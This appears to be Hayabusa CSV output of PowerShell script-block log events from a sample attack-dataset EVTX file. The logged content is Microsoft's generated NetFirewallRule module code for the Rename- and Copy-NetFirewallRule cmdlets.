'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 
@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_met",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"hodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } 
# .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] 
${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdle",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"t.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') 
-contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 